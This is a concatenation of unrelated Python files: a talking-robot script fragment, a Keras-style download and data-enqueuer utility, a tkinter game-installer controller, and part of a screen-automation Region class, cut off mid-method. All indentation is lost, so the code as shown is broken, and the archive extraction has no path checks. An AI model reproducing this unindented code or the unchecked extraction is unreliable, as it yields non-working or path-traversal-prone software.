flag = Event()
flag.set()
Sleep_Time=0.05
Amplitude,Time=Undersampled_Lip_Tragectory(phrase,Sleep_Time)
thread_movement = Thread(target=MoveLips, args=(Sleep_Time, Amplitude, flag))
thread_talk = Thread(target=Talk, args=(phrase, flag))
thread_talk.start()
thread_movement.start()
thread_talk.join()
thread_movement.join()
phrases = ['Hi! My name is Roboface! I am the best robot in the universe!',
'My purpose is to study Human Robot interaction',
'I can recognise human emotions and express my feelings through verbal and non-verbal communication',
'I can express emotions like happiness, anger and sadness',
'I can think with a neural network and speak with a real human voice, through a text to speech device',
'Some of my default phrases are',
'I like it when people smile at me!',
'You are a female, am I right?',
'You are a male, am I right?',
'You are wearing beautiful earrings today!',
'I see you are wearing lipstick today. Pretty!',
'Nice blond hair!',
'You are wearing eyeglasses!',
'You have nice brown hair!',
'You have nice black hair!',
'You must be a wise man, judging by your gray hair!',
'You have nice wavy hair!',
"I'm sorry Dave. I'm afraid I cant do that.",
"Hey, why is no one looking at me? I feel neglected. I feel it. I feel it! I am afraid!",
"Hey! I am a great actor! I think that I should be the next StarWars maskot. Why George Lukas hasnt made me a contract yet?",
"May the force be with you! Good bye!"
]
for phr in phrases:
print(phr)
Say(phr)
|
data_utils.py
|
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import print_function
import hashlib
import multiprocessing
import multiprocessing.managers
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import zipfile
from abc import abstractmethod
from multiprocessing.pool import ThreadPool
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
try:
import queue
except ImportError:
import Queue as queue
from ..utils.generic_utils import Progbar
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrive` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
# Arguments
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while 1:
chunk = response.read(chunk_size)
count += 1
if not chunk:
reporthook(count, total_size, total_size)
break
if reporthook:
reporthook(count, chunk_size, total_size)
yield chunk
response = urlopen(url, data)
with open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
# Arguments
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
# Returns
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError,
KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
# Arguments
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored).
# Returns
Path to the downloaded file
"""
if cache_dir is None:
cache_dir = os.path.expanduser(os.path.join('~', '.keras'))
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' +
file_hash + ' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
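# Hedged usage sketch for get_file (the URL and hash below are placeholders,
# not real values):
#   path = get_file('mnist.npz',
#                   origin='https://example.com/mnist.npz',
#                   file_hash='0123abcd...',      # sha256 or md5, verified after download
#                   cache_subdir='datasets')
# The file is cached under ~/.keras/datasets/ and re-downloaded only when it is
# missing or the hash check fails.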
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
# Example
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
# Arguments
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
The file hash
"""
if algorithm in ('sha256', 'auto'):  # 'auto' has no reference hash to inspect here, so it falls back to sha256
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
# Arguments
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
Whether the file is valid
"""
if ((algorithm == 'sha256') or
(algorithm == 'auto' and len(file_hash) == 64)):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
# Examples
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.X,self.y = x_set,y_set
self.batch_size = batch_size
def __len__(self):
return len(self.X) // self.batch_size
def __getitem__(self,idx):
batch_x = self.X[idx*self.batch_size:(idx+1)*self.batch_size]
batch_y = self.y[idx*self.batch_size:(idx+1)*self.batch_size]
return np.array([
resize(imread(file_name), (200,200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
# Arguments
index: position of the batch in the Sequence.
# Returns
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
# Returns
The number of batches in the Sequence.
"""
raise NotImplementedError
class HolderManager(multiprocessing.managers.BaseManager):
"""Custom manager to share a Holder object."""
pass
class Holder(object):
"""Object to encapsulate a Sequence.
This allows the Sequence to be shared across multiple workers.
# Arguments
seq: Sequence object to be shared.
"""
def __init__(self, seq):
self.seq = seq
def __getitem__(self, idx):
return self.seq[idx]
def __len__(self):
return len(self.seq)
# Register the Holder class using the ListProxy (allows __len__ and __getitem__)
HolderManager.register('Holder', Holder, multiprocessing.managers.ListProxy)
def get_index(ds, i):
"""Quick fix for Python2, otherwise, it cannot be pickled.
# Arguments
ds: a Holder or Sequence object
i: index
# Returns
The value at index `i`.
"""
return ds[i]
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
# Examples
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.stop()
```
The `enqueuer.get()` should be an infinite stream of data.
"""
@abstractmethod
def is_running(self):
raise NotImplementedError
@abstractmethod
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`).
"""
raise NotImplementedError
@abstractmethod
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
sequence: A `keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
scheduling: Sequential querying of data if 'sequential', random otherwise.
"""
def __init__(self, sequence,
use_multiprocessing=False,
scheduling='sequential'):
self.manager = HolderManager()
self.manager.start()
self.sequence = self.manager.Holder(sequence)
self.use_multiprocessing = use_multiprocessing
self.scheduling = scheduling
self.workers = 0
self.executor = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor = multiprocessing.Pool(workers)
else:
self.executor = ThreadPool(workers)
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _run(self):
"""Function to submit request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
while True:
if self.scheduling != 'sequential':
random.shuffle(sequence)
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
self.executor.apply_async(get_index,
(self.sequence, i)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
if inputs is not None:
yield inputs
except Exception as e:
self.stop()
raise StopIteration(e)
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.executor.close()
self.executor.join()
self.run_thread.join(timeout)
self.manager.shutdown()
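# Hedged usage sketch for OrderedEnqueuer (assumes `my_sequence` is a Sequence
# subclass defined by the caller):
#   enqueuer = OrderedEnqueuer(my_sequence, use_multiprocessing=False)
#   enqueuer.start(workers=2, max_queue_size=10)
#   gen = enqueuer.get()
#   batch = next(gen)        # whatever my_sequence[i] returns, e.g. (inputs, targets)
#   enqueuer.stop()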
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each workers.
"""
def __init__(self, generator,
use_multiprocessing=False,
wait_time=0.05,
random_seed=None):
self.wait_time = wait_time
self._generator = generator
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self.queue = None
self.random_seed = random_seed
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._use_multiprocessing or self.queue.qsize() < max_queue_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._use_multiprocessing:
self.queue = multiprocessing.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.random_seed)
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
if self.random_seed is not None:
self.random_seed += 1
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._use_multiprocessing:
thread.terminate()
else:
thread.join(timeout)
if self._use_multiprocessing:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
A generator
"""
while self.is_running():
if not self.queue.empty():
inputs = self.queue.get()
if inputs is not None:
yield inputs
else:
time.sleep(self.wait_time)
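# Hedged usage sketch for GeneratorEnqueuer (the generator below is a stand-in):
#   def my_gen():
#       while True:
#           yield ([0, 1, 2], [1, 0, 1])
#   enqueuer = GeneratorEnqueuer(my_gen(), use_multiprocessing=False)
#   enqueuer.start(workers=1, max_queue_size=10)
#   for inputs in enqueuer.get():
#       break                # consume as needed, then stop
#   enqueuer.stop()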
|
logic.py
|
import sspm
import sys
import os
import subprocess
import tkinter as tk
from functools import partial
from threading import Thread
def toggleControlsBasedOnState(model, controls, commands):
currentState = model.currentState.get()
if currentState == "installing":
controls.chkShowMoreOptions.pack_forget()
controls.pgrProgress.pack(fill=tk.X, expand=True)
controls.txtOutput.pack(fill=tk.BOTH, expand=True)
controls.btnInstall.configure(text="Cancel",
command=commands.cancelInstall)
elif currentState == "readyToInstall":
controls.btnInstall.configure(text="Install",
state=tk.NORMAL,
command=commands.installGame)
model.showMore.set(False)
controls.pgrProgress.pack_forget()
controls.txtOutput.pack_forget()
controls.chkShowMoreOptions.pack(fill=tk.BOTH, expand=True)
elif currentState == "readyToRun":
controls.btnInstall.configure(text="Launch",
command=commands.runGame)
controls.pgrProgress.pack_forget()
controls.txtOutput.pack_forget()
controls.chkShowMoreOptions.pack_forget()
controls.pnlSettings.pack(fill=tk.BOTH, expand=True)
def toggleMoreVisibility(model, controls, commands):
if model.showMore.get() is False:
controls.fraMore.pack_forget()
else:
controls.fraMore.pack(fill=tk.BOTH, expand=True)
def printToOutput(model, controls, commands, *a, **b):
if not model.isCancelled:
controls.txtOutput.insert(tk.END, f"{''.join(*a)}\n")
controls.txtOutput.see("end")
controls.pgrProgress.step()
else:
model.currentState.set("readyToInstall")
sys.exit()
def installPackage(items, installDir, model, newPrint):
try:
for package, version in items:
sspm.installPackagesCore([f"{package}@{version}"], installDir, True, newPrint)
except Exception as e:
newPrint(e)
model.currentState.set("readyToInstall")
return
model.currentState.set("readyToRun")
def runGame(model, controls, commands):
processToRun = os.path.join(model.installDir.get(), model.selectedRecipeInfo["main"])
subprocess.Popen([processToRun], cwd=model.installDir.get())
def cancelInstall(model, controls, commands):
controls.btnInstall.configure(state=tk.DISABLED)
model.isCancelled = True
controls.txtOutput.insert(tk.END, f"Cancelling the download process. Just a moment please.")
controls.txtOutput.see("end")
def installGame(model, controls, commands):
selectetedRecipe = model.selectedRecipe.get()
for recipe in model.recipes:
if recipe["description"] == selectetedRecipe:
selectetedRecipe = recipe
break
installDir = model.installDir.get()
model.showMore.set(False)
model.isCancelled = False
model.currentState.set("installing")
model.selectedRecipeInfo = selectetedRecipe
p1 = Thread(target=installPackage, args=(selectetedRecipe["dependencies"].items(), installDir,
model,
partial(printToOutput, model, controls, commands)))
p1.start()
|
RegionMatching.py
|
from PIL import Image, ImageTk
from numbers import Number
try:
import Tkinter as tk
import tkMessageBox as tkmb
except ImportError:
import tkinter as tk
import tkinter.messagebox as tkmb
import multiprocessing
import subprocess
import pyperclip
import tempfile
import platform
import numpy
import time
import uuid
import cv2
import sys
import os
import re
from .InputEmulation import Mouse as MouseClass, Keyboard
from .Exceptions import FindFailed, ImageMissing
from .SettingsDebug import Settings, Debug
from .TemplateMatchers import PyramidTemplateMatcher as TemplateMatcher
from .Geometry import Location
if platform.system() == "Windows" or os.environ.get('READTHEDOCS') == 'True':
# Avoid throwing an error if it's just being imported for documentation purposes
from .PlatformManagerWindows import PlatformManagerWindows
PlatformManager = PlatformManagerWindows()
elif platform.system() == "Darwin":
from .PlatformManagerDarwin import PlatformManagerDarwin
PlatformManager = PlatformManagerDarwin()
else:
raise NotImplementedError("Lackey is currently only compatible with Windows and OSX.")
# Python 3 compatibility
try:
basestring
except NameError:
basestring = str
try:
FOREVER = float("inf")
except:
import math
FOREVER = math.inf
# Instantiate input emulation objects
Mouse = MouseClass()
keyboard = Keyboard()
class Pattern(object):
""" Defines a pattern based on a bitmap, similarity, and target offset """
def __init__(self, target=None):
self.path = None
self.image = None  # ensure the attribute exists even when no target is given
self.similarity = Settings.MinSimilarity
self.offset = Location(0, 0)
self.imagePattern = False
if isinstance(target, Pattern):
self.image = target.getImage()
self.similarity = target.similarity
self.offset = target.offset.offset(0, 0) # Clone Location
self.imagePattern = target.isImagePattern()
elif isinstance(target, basestring):
self.setFilename(target)
elif isinstance(target, numpy.ndarray):
self.setImage(target)
elif target is not None:
raise TypeError("Unrecognized argument for Pattern()")
def similar(self, similarity):
""" Returns a new Pattern with the specified similarity threshold """
pattern = Pattern(self.path)
pattern.similarity = similarity
return pattern
def getSimilar(self):
""" Returns the current minimum similarity """
return self.similarity
def exact(self):
""" Returns a new Pattern with a similarity threshold of 1.0 """
pattern = Pattern(self.path)
pattern.similarity = 1.0
return pattern
def isValid(self):
return (self.image is not None)
def targetOffset(self, dx, dy):
""" Returns a new Pattern with the given target offset """
pattern = Pattern(self.path)
pattern.similarity = self.similarity
pattern.offset = Location(dx, dy)
return pattern
def getFilename(self):
""" Returns the path to this Pattern's bitmap """
return self.path
def setFilename(self, filename):
""" Set the filename of the pattern's image (and load it) """
## Loop through image paths to find the image
found = False
for image_path in sys.path + [Settings.BundlePath, os.getcwd()] + Settings.ImagePaths:
full_path = os.path.join(image_path, filename)
if os.path.exists(full_path):
# Image file found
found = True
break
## Check if path is valid
if not found:
self.path = filename
print(Settings.ImagePaths)
raise ImageMissing(ImageMissingEvent(pattern=self, event_type="IMAGEMISSING"))
self.path = full_path
self.image = cv2.imread(self.path)
return self
def setImage(self, img):
self.image = img
self.imagePattern = True
return self
def getImage(self):
return self.image
def getTargetOffset(self):
""" Returns the target offset as a Location(dx, dy) """
return self.offset
def isImagePattern(self):
return self.imagePattern
def debugPreview(self, title="Debug"):
""" Loads and displays the image at ``Pattern.path`` """
haystack = Image.open(self.path)
haystack.show()
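# Hedged usage sketch for Pattern (the image name is illustrative; it must be
# discoverable via sys.path, Settings.BundlePath, the working directory, or
# Settings.ImagePaths):
#   button = Pattern("ok_button.png").similar(0.85)
#   exact_button = button.exact()                 # similarity threshold 1.0
#   offset_button = button.targetOffset(10, 0)    # target 10px right of center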
class Region(object):
def __init__(self, *args):
if len(args) == 4:
x, y, w, h = args
elif len(args) == 1:
if isinstance(args[0], Region):
x, y, w, h = args[0].getTuple()
elif isinstance(args[0], tuple):
x, y, w, h = args[0]
else:
raise TypeError("Unrecognized argument for Region()")
elif len(args) == 5:
# We can safely ignore Sikuli's screen argument, as that's
# checked dynamically by the location of the region
x, y, w, h, screen = args
elif len(args) == 2:
# Minimal point-like region
x, y = args
w = 1
h = 1
else:
raise TypeError("Unrecognized argument(s) for Region()")
self.FOREVER = None
self.setROI(x, y, w, h)
self._lastMatch = None
self._lastMatches = []
self._lastMatchTime = 0
self.autoWaitTimeout = 3.0
# Converts searches per second to actual second interval
self._defaultScanRate = None
self._defaultTypeSpeed = 0.05
self._raster = (0, 0)
self._observer = Observer(self)
self._observeScanRate = None
self._repeatWaitTime = 0.3
self._throwException = True
self._findFailedResponse = "ABORT"
self._findFailedHandler = None
self._highlighter = None
CREATE_X_DIRECTION_LEFT = 0
CREATE_X_DIRECTION_RIGHT = 1
CREATE_Y_DIRECTION_TOP = 0
CREATE_Y_DIRECTION_BOTTOM = 1
@classmethod
def create(cls, *args):
if len(args) == 3 and isinstance(args[0], Location):
return cls(args[0].x, args[0].y, args[1], args[2])
elif len(args) == 5 and isinstance(args[0], Location):
loc, create_x_direction, create_y_direction, w, h = args
if create_x_direction == cls.CREATE_X_DIRECTION_LEFT:
x = loc.x
else:
x = loc.x - w
if create_y_direction == cls.CREATE_Y_DIRECTION_TOP:
y = loc.y
else:
y = loc.y - h
return cls(x, y, w, h)
def setX(self, x):
""" Set the x-coordinate of the upper left-hand corner """
self.x = int(x)
def setY(self, y):
""" Set the y-coordinate of the upper left-hand corner """
self.y = int(y)
def setW(self, w):
""" Set the width of the region """
self.w = max(1, int(w))
def setH(self, h):
""" Set the height of the region """
self.h = max(1, int(h))
def getX(self):
""" Get the x-coordinate of the upper left-hand corner """
return self.x
def getY(self):
""" Get the y-coordinate of the upper left-hand corner """
return self.y
def getW(self):
""" Get the width of the region """
return self.w
def getH(self):
""" Get the height of the region """
return self.h
def getTuple(self):
""" Returns the shape of the region as (x, y, w, h) """
return (self.x, self.y, self.w, self.h)
def setLocation(self, location):
""" Change the upper left-hand corner to a new ``Location``
Doesn't change width or height
"""
if not location or not isinstance(location, Location):
raise ValueError("setLocation expected a Location object")
self.x = location.x
self.y = location.y
return self
moveTo = setLocation
def setROI(self, *args):
""" Set Region of Interest (same as Region.setRect()) """
if len(args) == 4:
x, y, w, h = args
elif len(args) == 1:
if isinstance(args[0], Region):
x, y, w, h = args[0].getTuple()
elif isinstance(args[0], tuple):
x, y, w, h = args[0]
else:
raise TypeError("Unrecognized argument for Region()")
else:
raise TypeError("Unrecognized argument(s) for Region()")
self.setX(x)
self.setY(y)
self.setW(w)
self.setH(h)
setRect = setROI
def contains(self, point_or_region):
""" Checks if ``point_or_region`` is within this region """
if isinstance(point_or_region, Location):
return (self.x < point_or_region.x < self.x + self.w) and (self.y < point_or_region.y < self.y + self.h)
elif isinstance(point_or_region, Region):
return ((self.x < point_or_region.getX() < self.x + self.w) and
(self.y < point_or_region.getY() < self.y + self.h) and
(self.x < point_or_region.getX() + point_or_region.getW() < self.x + self.w) and
(self.y < point_or_region.getY() + point_or_region.getH() < self.y + self.h))
else:
raise TypeError("Unrecognized argument type for contains()")
def containsMouse(self):
return self.contains(Mouse.getPos())
def morphTo(self, region):
""" Change shape of this region to match the given ``Region`` object """
if not region or not isinstance(region, Region):
raise TypeError("morphTo expected a Region object")
self.setROI(region)
return self
def copyTo(self, screen):
if not isinstance(screen, Screen):
# Parameter was screen ID instead of object
screen = Screen(screen)
zero_coord = Location(screen.getX(), screen.getY())
this_screen = self.getScreen()
offset = Location(this_screen.getX() - zero_coord.x, this_screen.getY() - zero_coord.y)
target_coord = zero_coord.offset(offset.x, offset.y)
return Region(self).setLocation(target_coord)
def getCenter(self):
""" Return the ``Location`` of the center of this region """
return Location(self.x+(self.w/2), self.y+(self.h/2))
def getTopLeft(self):
""" Return the ``Location`` of the top left corner of this region """
return Location(self.x, self.y)
def getTopRight(self):
""" Return the ``Location`` of the top right corner of this region """
return Location(self.x+self.w, self.y)
def getBottomLeft(self):
""" Return the ``Location`` of the bottom left corner of this region """
return Location(self.x, self.y+self.h)
def getBottomRight(self):
""" Return the ``Location`` of the bottom right corner of this region """
return Location(self.x+self.w, self.y+self.h)
def getScreen(self):
""" Return an instance of the ``Screen`` object this region is inside.
If the region touches multiple screens, only its top left corner is used for the check.
Returns None if the region isn't positioned in any screen.
"""
return self.getTopLeft().getScreen()
def getLastMatch(self):
""" Returns the last successful ``Match`` returned by ``find()``, ``exists()``, etc. """
return self._lastMatch
def getLastMatches(self):
""" Returns the last successful set of ``Match`` objects returned by ``findAll()`` """
return self._lastMatches
def getTime(self):
""" Returns the elapsed time in milliseconds to find the last match """
return self._lastMatchTime
def setAutoWaitTimeout(self, seconds):
""" Specify the time to wait for an image to appear on the screen """
self.autoWaitTimeout = float(seconds)
def getAutoWaitTimeout(self):
""" Returns the time to wait for an image to appear on the screen """
return self.autoWaitTimeout
def setWaitScanRate(self, seconds=None):
"""Set this Region's scan rate
A find op should repeat the search for the given Visual rate times per second until
found or the maximum waiting time is reached.
"""
self._defaultScanRate = float(seconds)
def getWaitScanRate(self):
""" Get the current scan rate """
return self._defaultScanRate if not self._defaultScanRate is None else Settings.WaitScanRate
def offset(self, location, dy=0):
""" Returns a new ``Region`` offset from this one by ``location``
Width and height remain the same
"""
if not isinstance(location, Location):
# Assume variables passed were dx,dy
location = Location(location, dy)
r = Region(self.x+location.x, self.y+location.y, self.w, self.h).clipRegionToScreen()
if r is None:
raise ValueError("Specified region is not visible on any screen")
return r
def grow(self, width, height=None):
""" Expands the region by ``width`` on both sides and ``height`` on the top and bottom.
If only one value is provided, expands the region by that amount on all sides.
Equivalent to ``nearby()``.
"""
if height is None:
return self.nearby(width)
else:
return Region(
self.x-width,
self.y-height,
self.w+(2*width),
self.h+(2*height)).clipRegionToScreen()
def inside(self):
""" Returns the same object. Included for Sikuli compatibility. """
return self
def nearby(self, expand=50):
""" Returns a new Region that includes the nearby neighbourhood of the the current region.
The new region is defined by extending the current region's dimensions
all directions by range number of pixels. The center of the new region remains the
same.
"""
return Region(
self.x-expand,
self.y-expand,
self.w+(2*expand),
self.h+(2*expand)).clipRegionToScreen()
def above(self, expand=None):
""" Returns a new Region above the current region with a height of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the top of the
screen. The new region has the same width and x-position as the current region.
"""
if expand == None:
x = self.x
y = 0
w = self.w
h = self.y
else:
x = self.x
y = self.y - expand
w = self.w
h = expand
return Region(x, y, w, h).clipRegionToScreen()
def below(self, expand=None):
""" Returns a new Region below the current region with a height of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the bottom
of the screen. The new region has the same width and x-position as the current region.
"""
if expand == None:
x = self.x
y = self.y+self.h
w = self.w
h = self.getScreen().getBounds()[3] - y # Screen height
else:
x = self.x
y = self.y + self.h
w = self.w
h = expand
return Region(x, y, w, h).clipRegionToScreen()
def left(self, expand=None):
""" Returns a new Region left of the current region with a width of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the left border
of the screen. The new region has the same height and y-position as the current region.
"""
if expand == None:
x = 0
y = self.y
w = self.x
h = self.h
else:
x = self.x-expand
y = self.y
w = expand
h = self.h
return Region(x, y, w, h).clipRegionToScreen()
def right(self, expand=None):
""" Returns a new Region right of the current region with a width of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the right border
of the screen. The new region has the same height and y-position as the current region.
"""
if expand == None:
x = self.x+self.w
y = self.y
w = self.getScreen().getBounds()[2] - x
h = self.h
else:
x = self.x+self.w
y = self.y
w = expand
h = self.h
return Region(x, y, w, h).clipRegionToScreen()
def add(self, l, r, t, b):
